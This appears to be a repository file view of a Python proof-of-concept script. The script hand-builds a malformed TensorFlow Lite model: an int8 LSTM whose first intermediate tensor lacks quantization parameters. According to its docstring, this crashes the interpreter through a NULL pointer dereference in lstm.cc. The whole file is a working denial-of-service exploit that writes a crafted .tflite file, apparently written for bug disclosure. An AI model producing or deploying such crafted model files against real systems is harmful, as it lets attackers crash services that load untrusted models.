File size: 19,029 Bytes
befad9a
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
#!/usr/bin/env python3
"""
PoC: TFLite LSTM NULL pointer dereference -> DoS (SIGSEGV)

Bug: PopulateQuantizedLstmParams8x8_8() in lstm.cc (line ~674) reads
intermediate tensors' quantization.params without null check:

    auto* params = reinterpret_cast<TfLiteAffineQuantization*>(
        intermediate->quantization.params);
    intermediate_scale.push_back(params->scale->data[0]);  // NULL deref!

When an intermediate tensor has no QuantizationParameters in the flatbuffer,
quantization.params is NULL -> SIGSEGV at params->scale dereference.

Contrast with the sibling function PopulateQuantizedLstmParams8x8_16()
which uses GetIntermediatesSafe() - the 8x8_8 path skips this safe accessor.

Trigger: int8 quantized LSTM with 12 intermediate tensors (8x8->8 path),
where at least one intermediate lacks quantization metadata.

Builds .tflite flatbuffer directly (only needs `pip install flatbuffers`).
"""
import sys
import os
import struct

# ---------------------------------------------------------------------------
# Numeric constants used when hand-encoding the TFLite flatbuffer
# ---------------------------------------------------------------------------

# Value stored in the Model.version field.
TFLITE_SCHEMA_VERSION = 3

# TensorType enum values (listed in ascending numeric order).
TENSOR_TYPE_INT32 = 2
TENSOR_TYPE_INT16 = 7
TENSOR_TYPE_INT8 = 9

# BuiltinOperator enum value for the LSTM op.
BUILTIN_OP_LSTM = 16

# Index of LSTMOptions inside the BuiltinOptions union.
BUILTIN_OPTIONS_LSTM = 14

# ActivationFunctionType: no fused activation.
ACTIVATION_NONE = 0

# LSTMKernelType: the full kernel.
LSTM_KERNEL_FULL = 0

# Names of the 24 input slots of the full LSTM kernel; a name's position in
# this list is its operator input index.
LSTM_INPUT_NAMES = [
    # [0] data input
    "input",
    # [1-4] input-to-gate weights ([1] is optional: absent with CIFG)
    "input_to_input_weights",
    "input_to_forget_weights",
    "input_to_cell_weights",
    "input_to_output_weights",
    # [5-8] recurrent-to-gate weights ([5] is optional: absent with CIFG)
    "recurrent_to_input_weights",
    "recurrent_to_forget_weights",
    "recurrent_to_cell_weights",
    "recurrent_to_output_weights",
    # [9-11] cell-to-gate weights (all optional)
    "cell_to_input_weights",
    "cell_to_forget_weights",
    "cell_to_output_weights",
    # [12-15] gate biases ([12] is optional: absent with CIFG)
    "input_gate_bias",
    "forget_gate_bias",
    "cell_gate_bias",
    "output_gate_bias",
    # [16-17] projection (both optional)
    "projection_weights",
    "projection_bias",
    # [18-19] state tensors (variable)
    "output_state",
    "cell_state",
    # [20-23] layer-norm coefficients (all optional)
    "input_layer_norm_coefficients",
    "forget_layer_norm_coefficients",
    "cell_layer_norm_coefficients",
    "output_layer_norm_coefficients",
]


def create_poc_model(output_path, n_batch=1, n_input=2, n_cell=2, n_output=2):
    """Build a minimal .tflite file holding one int8 LSTM op and write it out.

    The model declares 12 intermediate tensors (the 8x8->8 quantized path).
    Intermediate 0 is written WITHOUT a QuantizationParameters table while
    the other eleven carry one; that missing table is what this PoC relies on
    to reach the NULL dereference described in the module docstring.

    The flatbuffer is encoded by hand with the low-level ``flatbuffers``
    builder, so tables are addressed by slot number rather than through
    generated schema classes.

    Args:
        output_path: Path of the .tflite file to create (overwritten).
        n_batch: Leading dimension of the input, state and output tensors.
        n_input: Second dimension of the input tensor and of the
            input-to-gate weight matrices.
        n_cell: Row count of every weight matrix, length of every gate bias
            and second dimension of the cell state.
        n_output: Second dimension of the output / output_state tensors and
            of the recurrent-to-gate weight matrices.

    Raises:
        ValueError: If any of the four dimensions is smaller than 1.
    """
    # Checked before the flatbuffers import so that bad arguments are
    # reported immediately and no partially-built file is ever written.
    for label, value in (("n_batch", n_batch), ("n_input", n_input),
                         ("n_cell", n_cell), ("n_output", n_output)):
        if value < 1:
            raise ValueError(f"{label} must be >= 1, got {value!r}")

    import flatbuffers

    b = flatbuffers.Builder(8192)

    num_intermediates = 12  # 12 intermediates select the 8x8->8 path

    # =========================================================================
    # Pre-build strings (must be created before any table starts)
    # =========================================================================
    s_main = b.CreateString("main")
    tensor_names = {}
    # Regular tensors
    for name in ["input", "i2f_w", "i2c_w", "i2o_w",
                 "r2f_w", "r2c_w", "r2o_w",
                 "fg_bias", "cg_bias", "og_bias",
                 "output_state", "cell_state", "output"]:
        tensor_names[name] = b.CreateString(name)
    # Intermediate tensors
    for i in range(num_intermediates):
        tensor_names[f"inter_{i}"] = b.CreateString(f"intermediate_{i}")

    # =========================================================================
    # Vector helpers. The builder writes back-to-front, hence reversed().
    # =========================================================================
    def make_int_vec(vals):
        """Create an int32 vector and return its offset."""
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals):
            b.PrependInt32(v)
        return b.EndVector()

    def make_float_vec(vals):
        """Create a float32 vector and return its offset."""
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals):
            b.PrependFloat32(v)
        return b.EndVector()

    def make_int64_vec(vals):
        """Create an int64 vector (used for zero_point) and return its offset."""
        b.StartVector(8, len(vals), 8)
        for v in reversed(vals):
            b.PrependInt64(v)
        return b.EndVector()

    def make_bool_vec(vals):
        """Create a bool vector and return its offset."""
        b.StartVector(1, len(vals), 1)
        for v in reversed(vals):
            b.PrependBool(v)
        return b.EndVector()

    def make_byte_vec(data):
        """Create a byte vector holding ``data`` and return its offset."""
        b.StartVector(1, len(data), 1)
        for byte in reversed(data):
            b.PrependByte(byte)
        return b.EndVector()

    # =========================================================================
    # Helper: create QuantizationParameters table
    # =========================================================================
    def make_quant(scale_val, zp_val=0):
        """Build a QuantizationParameters table with given scale and zero_point."""
        scale_vec = make_float_vec([scale_val])
        zp_vec = make_int64_vec([zp_val])
        # QuantizationParameters: 7 slots (0=min,1=max,2=scale,3=zero_point,
        #   4=details_type,5=details,6=quantized_dimension)
        b.StartObject(7)
        b.PrependUOffsetTRelativeSlot(2, scale_vec, 0)   # scale
        b.PrependUOffsetTRelativeSlot(3, zp_vec, 0)      # zero_point
        return b.EndObject()

    # =========================================================================
    # Helper: create Tensor table
    # =========================================================================
    def make_tensor(name_off, shape_off, tensor_type, buf_idx,
                    quant_off=0, is_variable=False):
        """Build a Tensor table.

        Tensor has 10+ fields:
          0=shape, 1=type, 2=buffer, 3=name, 4=quantization,
          5=is_variable, 6=sparsity, 7=shape_signature, 8=has_rank,
          9=variant_tensors

        A falsy ``quant_off`` leaves the quantization slot unset.
        """
        b.StartObject(10)
        b.PrependUOffsetTRelativeSlot(0, shape_off, 0)   # shape
        b.PrependByteSlot(1, tensor_type, 0)             # type
        b.PrependUint32Slot(2, buf_idx, 0)               # buffer
        b.PrependUOffsetTRelativeSlot(3, name_off, 0)    # name
        if quant_off:
            b.PrependUOffsetTRelativeSlot(4, quant_off, 0)  # quantization
        if is_variable:
            b.PrependBoolSlot(5, True, False)             # is_variable
        return b.EndObject()

    # =========================================================================
    # Shape vectors
    # =========================================================================
    shape_input = make_int_vec([n_batch, n_input])
    shape_weight_i = make_int_vec([n_cell, n_input])
    shape_weight_r = make_int_vec([n_cell, n_output])
    shape_bias = make_int_vec([n_cell])
    shape_ostate = make_int_vec([n_batch, n_output])
    shape_cstate = make_int_vec([n_batch, n_cell])
    shape_output = make_int_vec([n_batch, n_output])
    shape_inter = make_int_vec([1])                       # [1] minimal

    # =========================================================================
    # Quantization parameters
    # =========================================================================
    q_input = make_quant(0.1)           # input scale
    q_weight = make_quant(0.01)         # weight scale
    q_ostate = make_quant(0.1)          # output_state scale
    q_cstate = make_quant(1.0 / 32768)  # cell_state: must be 1/32768 for 8x8_8
    q_output = make_quant(0.1)          # output scale
    q_inter = make_quant(0.01)          # intermediate scale (for valid ones)

    # =========================================================================
    # Constant payloads (all zeros). Each payload is sized from the shape of
    # the tensor that owns it: input weights are [n_cell, n_input] INT8,
    # recurrent weights are [n_cell, n_output] INT8, biases are [n_cell] INT32.
    # =========================================================================
    input_weight_data = bytes(n_cell * n_input)
    recurrent_weight_data = bytes(n_cell * n_output)
    bias_data = bytes(n_cell * 4)

    # =========================================================================
    # Build tensors (13 regular + 12 intermediates)
    # =========================================================================
    # Buffer 0 is the empty sentinel, so tensor k always owns buffer k + 1.
    # Only weight and bias tensors carry bytes; every other buffer is empty.
    tensors = []
    const_data = {}  # buffer index -> payload bytes

    def add_tensor(key, shape_off, tensor_type, quant_off=0,
                   is_variable=False, data=None):
        """Append a tensor, giving it the next buffer index."""
        buf_idx = len(tensors) + 1
        if data is not None:
            const_data[buf_idx] = data
        tensors.append(make_tensor(tensor_names[key], shape_off, tensor_type,
                                   buf_idx, quant_off, is_variable))

    # Tensor 0: input, INT8 quantized
    add_tensor("input", shape_input, TENSOR_TYPE_INT8, q_input)

    # Tensors 1-3: input-to-{forget,cell,output} weights, INT8
    for key in ("i2f_w", "i2c_w", "i2o_w"):
        add_tensor(key, shape_weight_i, TENSOR_TYPE_INT8, q_weight,
                   data=input_weight_data)

    # Tensors 4-6: recurrent-to-{forget,cell,output} weights, INT8
    for key in ("r2f_w", "r2c_w", "r2o_w"):
        add_tensor(key, shape_weight_r, TENSOR_TYPE_INT8, q_weight,
                   data=recurrent_weight_data)

    # Tensors 7-9: {forget,cell,output}_gate_bias, INT32 (no quant needed)
    for key in ("fg_bias", "cg_bias", "og_bias"):
        add_tensor(key, shape_bias, TENSOR_TYPE_INT32, data=bias_data)

    # Tensor 10: output_state, INT8 quantized, VARIABLE
    add_tensor("output_state", shape_ostate, TENSOR_TYPE_INT8, q_ostate,
               is_variable=True)

    # Tensor 11: cell_state, INT16 quantized (scale=1/32768), VARIABLE
    add_tensor("cell_state", shape_cstate, TENSOR_TYPE_INT16, q_cstate,
               is_variable=True)

    # Tensor 12: output, INT8 quantized
    add_tensor("output", shape_output, TENSOR_TYPE_INT8, q_output)

    # Tensors 13-24: intermediates.
    # Key: intermediate[0] gets NO quantization table -> triggers NULL deref.
    first_intermediate = len(tensors)
    for i in range(num_intermediates):
        add_tensor(f"inter_{i}", shape_inter, TENSOR_TYPE_INT16,
                   0 if i == 0 else q_inter)

    # Tensors vector (must be in index order)
    b.StartVector(4, len(tensors), 4)
    for t in reversed(tensors):
        b.PrependUOffsetTRelative(t)
    tensors_vec = b.EndVector()

    # =========================================================================
    # LSTMOptions table
    # =========================================================================
    b.StartObject(5)  # LSTMOptions: 5 fields
    b.PrependByteSlot(0, ACTIVATION_NONE, 0)     # fused_activation_function
    b.PrependFloat32Slot(1, 0.0, 0.0)            # cell_clip
    b.PrependFloat32Slot(2, 0.0, 0.0)            # proj_clip
    b.PrependByteSlot(3, LSTM_KERNEL_FULL, 0)    # kernel_type = FULL
    b.PrependBoolSlot(4, False, False)            # asymmetric_quantize_inputs
    lstm_options = b.EndObject()

    # =========================================================================
    # Operator
    # =========================================================================
    # LSTM inputs: 24 entries. -1 = optional/absent.
    # Tensor indices: 0=input, 1=i2f_w, 2=i2c_w, 3=i2o_w, 4=r2f_w, 5=r2c_w,
    #   6=r2o_w, 7=fg_bias, 8=cg_bias, 9=og_bias, 10=output_state, 11=cell_state
    op_input_indices = [
        0,   # 0: input
        -1,  # 1: InputToInputWeights (CIFG mode, absent)
        1,   # 2: InputToForgetWeights
        2,   # 3: InputToCellWeights
        3,   # 4: InputToOutputWeights
        -1,  # 5: RecurrentToInputWeights (CIFG, absent)
        4,   # 6: RecurrentToForgetWeights
        5,   # 7: RecurrentToCellWeights
        6,   # 8: RecurrentToOutputWeights
        -1,  # 9: CellToInputWeights (absent)
        -1,  # 10: CellToForgetWeights (absent)
        -1,  # 11: CellToOutputWeights (absent)
        -1,  # 12: InputGateBias (CIFG, absent)
        7,   # 13: ForgetGateBias
        8,   # 14: CellGateBias
        9,   # 15: OutputGateBias
        -1,  # 16: ProjectionWeights (absent)
        -1,  # 17: ProjectionBias (absent)
        10,  # 18: OutputState (variable)
        11,  # 19: CellState (variable)
        -1,  # 20: InputLayerNormCoefficients (absent)
        -1,  # 21: ForgetLayerNormCoefficients (absent)
        -1,  # 22: CellLayerNormCoefficients (absent)
        -1,  # 23: OutputLayerNormCoefficients (absent)
    ]
    op_inputs_vec = make_int_vec(op_input_indices)
    op_outputs_vec = make_int_vec([12])  # output tensor

    # Intermediate tensor indices (the tensors appended last)
    op_intermediates_vec = make_int_vec(
        list(range(first_intermediate, first_intermediate + num_intermediates)))

    # mutating_variable_inputs: one flag per operator input, set only for
    # inputs 18 (output_state) and 19 (cell_state)
    op_mutating_vec = make_bool_vec(
        [slot in (18, 19) for slot in range(len(op_input_indices))])

    # Operator table: 14 slots (including union type/value split)
    # Slot 0: opcode_index, 1: inputs, 2: outputs,
    # 3: builtin_options_type, 4: builtin_options,
    # 5: custom_options, 6: custom_options_format,
    # 7: mutating_variable_inputs, 8: intermediates, ...
    b.StartObject(14)
    b.PrependUint32Slot(0, 0, 0)                              # opcode_index = 0
    b.PrependUOffsetTRelativeSlot(1, op_inputs_vec, 0)        # inputs
    b.PrependUOffsetTRelativeSlot(2, op_outputs_vec, 0)       # outputs
    b.PrependByteSlot(3, BUILTIN_OPTIONS_LSTM, 0)             # builtin_options_type
    b.PrependUOffsetTRelativeSlot(4, lstm_options, 0)         # builtin_options
    b.PrependUOffsetTRelativeSlot(7, op_mutating_vec, 0)      # mutating_variable_inputs
    b.PrependUOffsetTRelativeSlot(8, op_intermediates_vec, 0) # intermediates
    operator = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(operator)
    operators_vec = b.EndVector()

    # =========================================================================
    # SubGraph
    # =========================================================================
    sg_inputs = make_int_vec([0])    # model input: tensor 0
    sg_outputs = make_int_vec([12])  # model output: tensor 12

    b.StartObject(5)  # SubGraph: 5 fields
    b.PrependUOffsetTRelativeSlot(0, tensors_vec, 0)     # tensors
    b.PrependUOffsetTRelativeSlot(1, sg_inputs, 0)       # inputs
    b.PrependUOffsetTRelativeSlot(2, sg_outputs, 0)      # outputs
    b.PrependUOffsetTRelativeSlot(3, operators_vec, 0)   # operators
    b.PrependUOffsetTRelativeSlot(4, s_main, 0)          # name
    subgraph = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(subgraph)
    subgraphs_vec = b.EndVector()

    # =========================================================================
    # OperatorCode
    # =========================================================================
    b.StartObject(4)  # OperatorCode: 4 fields
    b.PrependByteSlot(0, BUILTIN_OP_LSTM, 0)     # deprecated_builtin_code
    b.PrependInt32Slot(2, 1, 1)                   # version
    b.PrependInt32Slot(3, BUILTIN_OP_LSTM, 0)     # builtin_code
    op_code = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(op_code)
    opcodes_vec = b.EndVector()

    # =========================================================================
    # Buffers: sentinel 0 plus one buffer per tensor
    # =========================================================================
    # Data vectors are created before any Buffer table is started because
    # the builder does not allow nested construction.
    data_vecs = {idx: make_byte_vec(const_data[idx])
                 for idx in sorted(const_data)}

    bufs = []
    for buf_idx in range(len(tensors) + 1):
        b.StartObject(1)
        if buf_idx in data_vecs:
            b.PrependUOffsetTRelativeSlot(0, data_vecs[buf_idx], 0)
        bufs.append(b.EndObject())

    b.StartVector(4, len(bufs), 4)
    for buf_off in reversed(bufs):
        b.PrependUOffsetTRelative(buf_off)
    buffers_vec = b.EndVector()

    # =========================================================================
    # Model (root table)
    # =========================================================================
    b.StartObject(8)  # Model: 8 fields
    b.PrependUint32Slot(0, TFLITE_SCHEMA_VERSION, 0)      # version
    b.PrependUOffsetTRelativeSlot(1, opcodes_vec, 0)       # operator_codes
    b.PrependUOffsetTRelativeSlot(2, subgraphs_vec, 0)     # subgraphs
    b.PrependUOffsetTRelativeSlot(4, buffers_vec, 0)       # buffers
    model = b.EndObject()

    b.Finish(model, b"TFL3")  # "TFL3" is written as the file identifier
    buf = bytes(b.Output())

    with open(output_path, 'wb') as f:
        f.write(buf)

    print(f"[+] Model written: {output_path} ({len(buf)} bytes)")
    print(f"[+] LSTM config: n_batch={n_batch}, n_input={n_input}, "
          f"n_cell={n_cell}, n_output={n_output}")
    print("[+] 12 intermediate tensors (8x8->8 quantized LSTM path)")
    print("[+] intermediate[0] has NO quantization params -> NULL deref")
    print("[+] Bug location: lstm.cc PopulateQuantizedLstmParams8x8_8()")
    print("[+]   auto* params = reinterpret_cast<TfLiteAffineQuantization*>(")
    print("[+]       intermediate->quantization.params);  // NULL!")
    print("[+]   params->scale->data[0];  // SIGSEGV")


# Script entry point: write the PoC model into the directory that holds this
# script, regardless of the current working directory.
if __name__ == "__main__":
    script_dir = os.path.dirname(os.path.abspath(__file__))
    out = os.path.join(script_dir, "poc_lstm_null_deref.tflite")
    create_poc_model(out)